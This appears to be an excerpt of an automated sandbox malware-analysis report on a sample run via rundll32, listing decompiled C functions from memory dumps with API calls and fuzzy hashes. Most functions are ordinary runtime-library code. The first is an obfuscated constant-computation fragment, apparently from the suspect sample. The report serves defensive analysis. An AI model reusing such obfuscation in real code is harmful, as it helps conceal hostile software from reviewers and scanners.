                                                                                                                    				_v12 = _v12 | 0x2785cc64;
                                                                                                                    				_v12 = _v12 >> 5;
                                                                                                                    				_v12 = _v12 ^ 0x05b45dea;
                                                                                                                    				_v8 = 0x56f6d9;
                                                                                                                    				_v8 = _v8 + 0xc121;
                                                                                                                    				_t73 = __edx;
                                                                                                                    				_t67 = 0x41;
                                                                                                                    				_v8 = _v8 / _t67;
                                                                                                                    				_v8 = _v8 << 7;
                                                                                                                    				_v8 = _v8 ^ 0x00a76089;
                                                                                                                    				_v24 = 0xf5edfd;
                                                                                                                    				_v24 = _v24 | 0x2f446a90;
                                                                                                                    				_v24 = _v24 ^ 0x7c479bdf;
                                                                                                                    				_v24 = _v24 ^ 0x53b1dfb9;
                                                                                                                    				_v20 = 0xafa903;
                                                                                                                    				_v20 = _v20 + 0xffff9fdf;
                                                                                                                    				_v20 = _v20 ^ 0xafba618c;
                                                                                                                    				_v20 = _v20 ^ 0xaf136809;
                                                                                                                    				_v16 = 0x74f1b4;
                                                                                                                    				_v16 = _v16 >> 7;
                                                                                                                    				_v16 = _v16 | 0x7bde77db;
                                                                                                                    				_v16 = _v16 ^ 0x7bddce28;
                                                                                                                    				return E00331E22(_v28, _v24, _t73, E00331DB9(_t67), _v20, _v16);
                                                                                                                    			}















                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                    • Instruction ID: 41a9f9af7a3188592d271dfdf22bc6ee7cfe0cd6ef14466f74770672268383c6
                                                                                                                    • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                    • Instruction Fuzzy Hash: 4921EFB2C0131EEBCB48DFE5D98A4EEFBB0BB14314F208189D512B6264C3B40B498F91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00344087() {
                                                                                                                    
                                                                                                                    				return  *[fs:0x30];
                                                                                                                    			}




                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* __ebp;
                                                                                                                    				signed int _t73;
                                                                                                                    				struct HINSTANCE__* _t78;
                                                                                                                    				_Unknown_base(*)()* _t79;
                                                                                                                    				struct HINSTANCE__* _t81;
                                                                                                                    				signed int _t92;
                                                                                                                    				signed int _t94;
                                                                                                                    				unsigned int _t97;
                                                                                                                    				void* _t113;
                                                                                                                    				unsigned int _t115;
                                                                                                                    				signed short _t123;
                                                                                                                    				unsigned int _t124;
                                                                                                                    				_Unknown_base(*)()* _t131;
                                                                                                                    				signed short _t133;
                                                                                                                    				unsigned int _t134;
                                                                                                                    				intOrPtr _t143;
                                                                                                                    				void* _t144;
                                                                                                                    				int _t145;
                                                                                                                    				int _t146;
                                                                                                                    				signed int _t164;
                                                                                                                    				void* _t167;
                                                                                                                    				signed int _t169;
                                                                                                                    				void* _t170;
                                                                                                                    				int _t172;
                                                                                                                    				signed int _t176;
                                                                                                                    				void* _t177;
                                                                                                                    				CHAR* _t181;
                                                                                                                    				void* _t183;
                                                                                                                    				void* _t184;
                                                                                                                    
                                                                                                                    				_t167 = __edx;
                                                                                                                    				_t184 = _t183 - 0x118;
                                                                                                                    				_t181 = _t184 - 4;
                                                                                                                    				_t73 =  *0x100545cc; // 0x3f6a93de
                                                                                                                    				_t181[0x118] = _t73 ^ _t181;
                                                                                                                    				_push(0x58);
                                                                                                                    				E10030D27(E10043F3E, __ebx, __edi, __esi);
                                                                                                                    				_t169 = 0;
                                                                                                                    				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                    				 *(_t181 - 0x14) = 0;
                                                                                                                    				 *(_t181 - 0x10) = 0;
                                                                                                                    				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                    				 *(_t181 - 0x18) = _t78;
                                                                                                                    				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                    				if(_t79 == 0) {
                                                                                                                    					if(GetVersion() >= 0) {
                                                                                                                    						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                    						if(_t81 != 0) {
                                                                                                                    							 *(_t181 - 0x14) = 0;
                                                                                                                    							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
                                                                                                                    							if( *(_t181 - 0x14) != 0) {
                                                                                                                    								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                    								_t145 = _t97 & 0x3ff;
                                                                                                                    								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                    								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                    								 *(_t181 - 0x10) = 2;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						 *(_t181 - 0x18) = 0;
                                                                                                                    						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                    							 *(_t181 - 0x44) = 0x10;
                                                                                                                    							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                    								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                    								_t184 = _t184 + 0xc;
                                                                                                                    								if(_t113 == 1) {
                                                                                                                    									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                    									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                    									_t146 = _t115 & 0x3ff;
                                                                                                                    									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                    									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                    									 *(_t181 - 0x10) = 2;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							RegCloseKey( *(_t181 - 0x18));
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                    					 *(_t181 - 0x14) = _t123;
                                                                                                                    					_t124 = _t123 & 0x0000ffff;
                                                                                                                    					_t164 = _t124 & 0x3ff;
                                                                                                                    					 *(_t181 - 0x1c) = _t164;
                                                                                                                    					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                    					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                    					 *(_t181 - 0x10) = 2;
                                                                                                                    					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                    					if(_t131 != 0) {
                                                                                                                    						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                    						 *(_t181 - 0x14) = _t133;
                                                                                                                    						_t134 = _t133 & 0x0000ffff;
                                                                                                                    						_t172 = _t134 & 0x3ff;
                                                                                                                    						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                    						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                    						 *(_t181 - 0x10) = 4;
                                                                                                                    					}
                                                                                                                    					_t169 = 0;
                                                                                                                    				}
                                                                                                                    				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                    				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                    				_t181[0x105] = 0;
                                                                                                                    				_t181[0x104] = 0;
                                                                                                                    				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                    					_t143 = 0x20;
                                                                                                                    					E10030030(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                    					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                    					 *(_t181 - 0x5c) = _t181;
                                                                                                                    					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                    					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                    					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                    					E10014538(_t181 - 0x3c, 0xffffffff);
                                                                                                                    					 *(_t181 - 4) = _t169;
                                                                                                                    					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                    						E1001461E(_t181 - 0x3c);
                                                                                                                    					}
                                                                                                                    					_t176 = 0;
                                                                                                                    					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                    						L23:
                                                                                                                    						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                    						E10014C3E(_t181 - 0x3c);
                                                                                                                    						_t92 = _t169;
                                                                                                                    						goto L24;
                                                                                                                    					} else {
                                                                                                                    						while(1) {
                                                                                                                    							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
                                                                                                                    							if(_t94 != _t169) {
                                                                                                                    								break;
                                                                                                                    							}
                                                                                                                    							_t176 =  &(1[_t176]);
                                                                                                                    							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							goto L23;
                                                                                                                    						}
                                                                                                                    						_t169 = _t94;
                                                                                                                    						goto L23;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t92 = 0;
                                                                                                                    					L24:
                                                                                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                    					_pop(_t170);
                                                                                                                    					_pop(_t177);
                                                                                                                    					_pop(_t144);
                                                                                                                    					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                    				}
                                                                                                                    			}

                                                                                                                    0x1001503a
                                                                                                                    0x1001503f
                                                                                                                    0x1001505c
                                                                                                                    0x1001505c
                                                                                                                    0x10015063
                                                                                                                    0x10015068
                                                                                                                    0x00000000
                                                                                                                    0x10015041
                                                                                                                    0x10015041
                                                                                                                    0x10015048
                                                                                                                    0x10015050
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10015052
                                                                                                                    0x10015056
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10015058
                                                                                                                    0x1001505a
                                                                                                                    0x00000000
                                                                                                                    0x1001505a
                                                                                                                    0x10014ebc
                                                                                                                    0x10014ebc
                                                                                                                    0x1001506a
                                                                                                                    0x1001506d
                                                                                                                    0x10015075
                                                                                                                    0x10015076
                                                                                                                    0x10015077
                                                                                                                    0x1001508c
                                                                                                                    0x1001508c

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                    • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                    • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                    • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                    • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                    • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                    • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                    • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                    • _memset.LIBCMT ref: 10014FF3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                    • API String ID: 434808117-483790700
                                                                                                                    • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                    • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                    • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                    • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E1002E129(intOrPtr* __ecx) {
                                                                                                                    				intOrPtr* _t27;
                                                                                                                    
                                                                                                                    				_t27 = __ecx;
                                                                                                                    				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                    				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                    				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                    				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                    				return _t27;
                                                                                                                    			}





                                                                                                                    APIs
                                                                                                                    • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                    • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                    • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                    • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                    • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                    • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                    • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                    • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                    • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                    • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                    • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                    • API String ID: 1228543026-2889995556
                                                                                                                    • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                    • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                    • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                    • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E1003548E(void* __ebx, void* __edx) {
                                                                                                                    				void* __edi;
                                                                                                                    				void* __esi;
                                                                                                                    				_Unknown_base(*)()* _t7;
                                                                                                                    				long _t10;
                                                                                                                    				void* _t11;
                                                                                                                    				int _t12;
                                                                                                                    				void* _t18;
                                                                                                                    				intOrPtr _t21;
                                                                                                                    				long _t26;
                                                                                                                    				void* _t30;
                                                                                                                    				void* _t37;
                                                                                                                    				struct HINSTANCE__* _t38;
                                                                                                                    				void* _t41;
                                                                                                                    				void* _t43;
                                                                                                                    
                                                                                                                    				_t37 = __edx;
                                                                                                                    				_t30 = __ebx;
                                                                                                                    				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                    				if(_t38 != 0) {
                                                                                                                    					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
                                                                                                                    					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
                                                                                                                    					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
                                                                                                                    					_t7 = GetProcAddress(_t38, "FlsFree");
                                                                                                                    					__eflags =  *0x10057934;
                                                                                                                    					_t41 = TlsSetValue;
                                                                                                                    					 *0x10057940 = _t7;
                                                                                                                    					if( *0x10057934 == 0) {
                                                                                                                    						L6:
                                                                                                                    						 *0x10057938 = TlsGetValue;
                                                                                                                    						 *0x10057934 = E10035111;
                                                                                                                    						 *0x1005793c = _t41;
                                                                                                                    						 *0x10057940 = TlsFree;
                                                                                                                    					} else {
                                                                                                                    						__eflags =  *0x10057938;
                                                                                                                    						if( *0x10057938 == 0) {
                                                                                                                    							goto L6;
                                                                                                                    						} else {
                                                                                                                    							__eflags =  *0x1005793c;
                                                                                                                    							if( *0x1005793c == 0) {
                                                                                                                    								goto L6;
                                                                                                                    							} else {
                                                                                                                    								__eflags = _t7;
                                                                                                                    								if(_t7 == 0) {
                                                                                                                    									goto L6;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t10 = TlsAlloc();
                                                                                                                    					__eflags = _t10 - 0xffffffff;
                                                                                                                    					 *0x100547c8 = _t10;
                                                                                                                    					if(_t10 == 0xffffffff) {
                                                                                                                    						L15:
                                                                                                                    						_t11 = 0;
                                                                                                                    						__eflags = 0;
                                                                                                                    					} else {
                                                                                                                    						_t12 = TlsSetValue(_t10,  *0x10057938);
                                                                                                                    						__eflags = _t12;
                                                                                                                    						if(_t12 == 0) {
                                                                                                                    							goto L15;
                                                                                                                    						} else {
                                                                                                                    							E100310CD();
                                                                                                                    							 *0x10057934 = E10035042( *0x10057934);
                                                                                                                    							 *0x10057938 = E10035042( *0x10057938);
                                                                                                                    							 *0x1005793c = E10035042( *0x1005793c);
                                                                                                                    							 *0x10057940 = E10035042( *0x10057940);
                                                                                                                    							_t18 = E10035923();
                                                                                                                    							__eflags = _t18;
                                                                                                                    							if(_t18 == 0) {
                                                                                                                    								L14:
                                                                                                                    								E10035178(_t37);
                                                                                                                    								goto L15;
                                                                                                                    							} else {
                                                                                                                    								_push(E10035304);
                                                                                                                    								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
                                                                                                                    								__eflags = _t21 - 0xffffffff;
                                                                                                                    								 *0x100547c4 = _t21;
                                                                                                                    								if(_t21 == 0xffffffff) {
                                                                                                                    									goto L14;
                                                                                                                    								} else {
                                                                                                                    									_t43 = E10035840(1, 0x214);
                                                                                                                    									__eflags = _t43;
                                                                                                                    									if(_t43 == 0) {
                                                                                                                    										goto L14;
                                                                                                                    									} else {
                                                                                                                    										_push(_t43);
                                                                                                                    										_push( *0x100547c4);
                                                                                                                    										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
                                                                                                                    										if(__eflags == 0) {
                                                                                                                    											goto L14;
                                                                                                                    										} else {
                                                                                                                    											_push(0);
                                                                                                                    											_push(_t43);
                                                                                                                    											E100351B5(_t30, _t37, _t38, _t43, __eflags);
                                                                                                                    											_t26 = GetCurrentThreadId();
                                                                                                                    											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                                                                    											 *_t43 = _t26;
                                                                                                                    											_t11 = 1;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					return _t11;
                                                                                                                    				} else {
                                                                                                                    					E10035178(_t37);
                                                                                                                    					return 0;
                                                                                                                    				}
                                                                                                                    			}


















                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                    • __mtterm.LIBCMT ref: 100354A0
                                                                                                                      • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                      • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                    • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                    • __init_pointers.LIBCMT ref: 10035552
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                    • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                    • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                    • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                    • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                    • API String ID: 4287529916-3819984048
                                                                                                                    • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                    • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                    • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                    • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 92%
